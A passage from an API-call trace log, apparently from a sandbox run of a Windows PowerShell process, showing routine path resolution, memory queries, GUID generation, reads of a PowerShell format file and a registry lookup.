lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0103.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0103.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0103.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0103.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0103.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0103.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0103.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0103.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0103.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0103.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0103.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0103.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0103.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0103.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.206] VirtualQuery (in: lpAddress=0x1ab860, lpBuffer=0x1ac720, dwLength=0x30 | out: lpBuffer=0x1ac720*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.207] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x3bc13e3f, Data2=0x6f93, Data3=0x431c, Data4=([0]=0xa1, [1]=0xbd, [2]=0xd2, [3]=0x5a, [4]=0x3e, [5]=0x88, [6]=0x3b, [7]=0x8b))) returned 0x0 [0103.207] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x7fb02310, Data2=0xdf99, Data3=0x45bb, Data4=([0]=0xa2, [1]=0x2f, [2]=0xd1, [3]=0xff, [4]=0xdd, [5]=0x7d, [6]=0xc8, [7]=0xb1))) returned 0x0 [0103.207] VirtualQuery (in: lpAddress=0x1aba10, lpBuffer=0x1ac8d0, dwLength=0x30 | out: lpBuffer=0x1ac8d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.208] VirtualQuery (in: lpAddress=0x1aba10, lpBuffer=0x1ac8d0, dwLength=0x30 | out: lpBuffer=0x1ac8d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.208] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xb18b7414, Data2=0x4749, Data3=0x49a7, Data4=([0]=0xb6, [1]=0xd2, [2]=0x95, [3]=0x12, [4]=0xd5, [5]=0xd1, [6]=0xca, [7]=0xb0))) returned 0x0 [0103.209] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xba6dd529, Data2=0xa09, Data3=0x4a28, Data4=([0]=0x85, [1]=0xce, [2]=0x4a, [3]=0x1, [4]=0x63, [5]=0xf0, [6]=0xd0, [7]=0xe0))) returned 0x0 [0103.209] VirtualQuery (in: lpAddress=0x1abc60, lpBuffer=0x1acb20, dwLength=0x30 | out: lpBuffer=0x1acb20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.209] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.210] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.210] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa6e50db3, Data2=0xdfdc, Data3=0x47d2, Data4=([0]=0x8d, [1]=0x81, [2]=0x81, [3]=0x67, [4]=0xa1, [5]=0xda, [6]=0x24, [7]=0xee))) returned 0x0 [0103.210] VirtualQuery (in: lpAddress=0x1abc60, lpBuffer=0x1acb20, dwLength=0x30 | out: lpBuffer=0x1acb20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.211] VirtualQuery (in: lpAddress=0x1aba80, lpBuffer=0x1ac940, dwLength=0x30 | out: lpBuffer=0x1ac940*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.211] VirtualQuery (in: lpAddress=0x1ab2d0, lpBuffer=0x1ac190, dwLength=0x30 | out: lpBuffer=0x1ac190*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.211] VirtualQuery (in: lpAddress=0x1ab2d0, lpBuffer=0x1ac190, dwLength=0x30 | out: lpBuffer=0x1ac190*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.211] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xb793458, Data2=0xf15d, Data3=0x482c, Data4=([0]=0xbf, [1]=0xd7, [2]=0x5a, [3]=0xf3, [4]=0x53, [5]=0x43, [6]=0xd9, [7]=0x71))) returned 0x0 [0103.212] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x9d38be53, Data2=0xaeec, Data3=0x452c, Data4=([0]=0x80, [1]=0xf8, [2]=0x27, [3]=0x4b, [4]=0xd3, [5]=0x37, [6]=0x50, [7]=0xa0))) returned 0x0 [0103.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.212] SetErrorMode (uMode=0x1) returned 0x1 [0103.212] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0103.212] GetFileType (hFile=0x308) returned 0x1 [0103.212] SetErrorMode (uMode=0x1) returned 0x1 [0103.212] GetFileType (hFile=0x308) returned 0x1 [0103.213] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.214] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.215] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.215] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.216] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.216] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.216] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.216] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.218] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.218] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.218] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.218] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.219] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.219] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.219] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.219] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.221] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.222] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0xbce, lpOverlapped=0x0) returned 1 [0103.222] ReadFile (in: hFile=0x308, lpBuffer=0x33e55ee, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e55ee*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.222] ReadFile (in: hFile=0x308, lpBuffer=0x33e5eb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33e5eb8*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.223] SetErrorMode (uMode=0x1) returned 0x1 [0103.223] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acce0 | out: lpFileInformation=0x1acce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0103.223] SetErrorMode (uMode=0x1) returned 0x1 [0103.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.223] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acdc8 | out: phkResult=0x1acdc8*=0x308) returned 0x0 [0103.223] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd4c, lpData=0x0, lpcbData=0x1acd48*=0x0 | out: lpType=0x1acd4c*=0x1, lpData=0x0, lpcbData=0x1acd48*=0x56) returned 0x0 [0103.223] CoTaskMemAlloc (cb=0x5a) returned 0x1b753fe0 [0103.223] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd1c, lpData=0x1b753fe0, lpcbData=0x1acd18*=0x56 | out: lpType=0x1acd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd18*=0x56) returned 0x0 [0103.223] CoTaskMemFree (pv=0x1b753fe0) [0103.223] RegCloseKey (hKey=0x308) returned 0x0 [0103.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.228] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xb382c382, Data2=0xc307, Data3=0x4e98, Data4=([0]=0xb8, [1]=0x47, [2]=0xb7, [3]=0x3b, [4]=0xf, [5]=0xda, [6]=0xa5, [7]=0x95))) returned 0x0 [0103.229] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x4ce6a20, Data2=0x13e1, Data3=0x4fbd, Data4=([0]=0xa8, [1]=0x75, [2]=0x92, [3]=0x54, [4]=0xd9, [5]=0x3f, [6]=0x10, [7]=0x67))) returned 0x0 [0103.229] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x5fb800c2, Data2=0xdc9a, Data3=0x4f4d, Data4=([0]=0x88, [1]=0x54, [2]=0x76, [3]=0x7c, [4]=0x47, [5]=0x27, [6]=0x34, [7]=0xd5))) returned 0x0 [0103.229] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xc083fec7, Data2=0xe592, Data3=0x4392, Data4=([0]=0x8a, [1]=0xc9, [2]=0xb4, [3]=0xdd, [4]=0xe5, [5]=0xac, [6]=0x3f, [7]=0xec))) returned 0x0 [0103.229] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xd4265283, Data2=0x47a6, Data3=0x49b2, Data4=([0]=0xbf, [1]=0x72, [2]=0x55, [3]=0x90, [4]=0x2a, [5]=0x32, [6]=0x11, [7]=0xe8))) returned 0x0 [0103.230] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x64a86d3a, Data2=0x2927, Data3=0x485d, Data4=([0]=0x89, [1]=0x42, [2]=0x94, [3]=0x6, [4]=0x21, [5]=0xb1, [6]=0x24, [7]=0x91))) returned 0x0 [0103.230] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.230] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa7471559, Data2=0xf668, Data3=0x445b, Data4=([0]=0x99, [1]=0x32, [2]=0x52, [3]=0xeb, [4]=0xfe, [5]=0xc0, [6]=0x87, [7]=0xac))) returned 0x0 [0103.231] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.231] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.231] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x95451559, Data2=0xfaa0, Data3=0x4440, Data4=([0]=0xa2, [1]=0x26, [2]=0x5d, [3]=0xfd, [4]=0xcc, [5]=0x2c, [6]=0x1, [7]=0x63))) returned 0x0 [0103.231] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xc7c9bb57, Data2=0x28f6, Data3=0x4650, Data4=([0]=0x87, [1]=0x97, [2]=0xa0, [3]=0x2c, [4]=0x8d, [5]=0xbc, [6]=0xe1, [7]=0x1b))) returned 0x0 [0103.232] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xcac0d3f4, Data2=0x44b5, Data3=0x488d, Data4=([0]=0x9e, [1]=0xb7, [2]=0x92, [3]=0x8, [4]=0xfd, [5]=0xa, [6]=0x19, [7]=0x3d))) returned 0x0 [0103.232] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xb1797432, Data2=0x3bef, Data3=0x4169, Data4=([0]=0x9e, [1]=0xd0, [2]=0x9, [3]=0x3d, [4]=0xa5, [5]=0xb3, [6]=0x80, [7]=0x60))) returned 0x0 [0103.232] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.232] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x35af5484, Data2=0xd982, Data3=0x40bc, Data4=([0]=0xb9, [1]=0x33, [2]=0xa5, [3]=0xd6, [4]=0x90, [5]=0x77, [6]=0xa4, [7]=0xb4))) returned 0x0 [0103.233] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, 